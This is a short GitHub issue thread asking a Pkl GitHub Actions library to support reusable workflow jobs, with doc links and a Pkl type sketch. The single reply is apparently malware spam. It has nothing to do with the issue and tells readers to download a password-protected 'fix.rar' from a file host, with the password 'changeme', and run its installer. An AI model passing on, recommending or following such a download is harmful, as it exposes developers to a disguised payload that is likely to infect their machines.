### ISSUE TITLE
Support reusable workflow jobs

### ISSUE THREAD

**Issue by StefMa** [StefMa/pkl-gha#10]
See https://docs.github.com/en/actions/sharing-automations/reusing-workflows#calling-a-reusable-workflow
and `reusableWorkflowCallJob` in https://json.schemastore.org/github-workflow.json
and https://github.com/realm/realm-dotnet/pull/3603/files#diff-f3b41c2a32e0d2f721a847123abdf488ac28d05a61deb9daae1aeb9aeb950584R586-R590

The config could look like:
```pkl
jobs: Mapping<String, *NormalJob|ReusableWorkflowJob>(jobIsSet)
```
IIRC then the NormalJob will be preferred and can be used with simply `new { }`, but you can use the ReusableWorkflowJob by saying `new ReusableWorkflowJob {}`.

**Comment by miniMuggle** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."
